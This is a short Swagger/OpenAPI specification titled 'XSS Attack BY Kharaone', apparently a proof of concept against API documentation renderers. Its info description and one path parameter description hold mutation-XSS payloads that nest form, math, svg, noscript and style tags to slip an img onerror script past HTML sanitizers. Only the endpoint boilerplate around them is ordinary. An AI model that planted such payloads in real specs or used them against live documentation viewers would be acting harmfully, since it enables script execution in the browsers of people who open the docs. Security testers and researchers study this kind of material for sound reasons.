swagger: '2.0'
info:
  title: XSS Attack BY Kharaone
  description: |
    <form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /Kharaone:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - Kharaone_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">

          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by id
components:
  schemas:
    Test:
      type: object
      properties:
        name:
          type: string
          example: "<something here>"
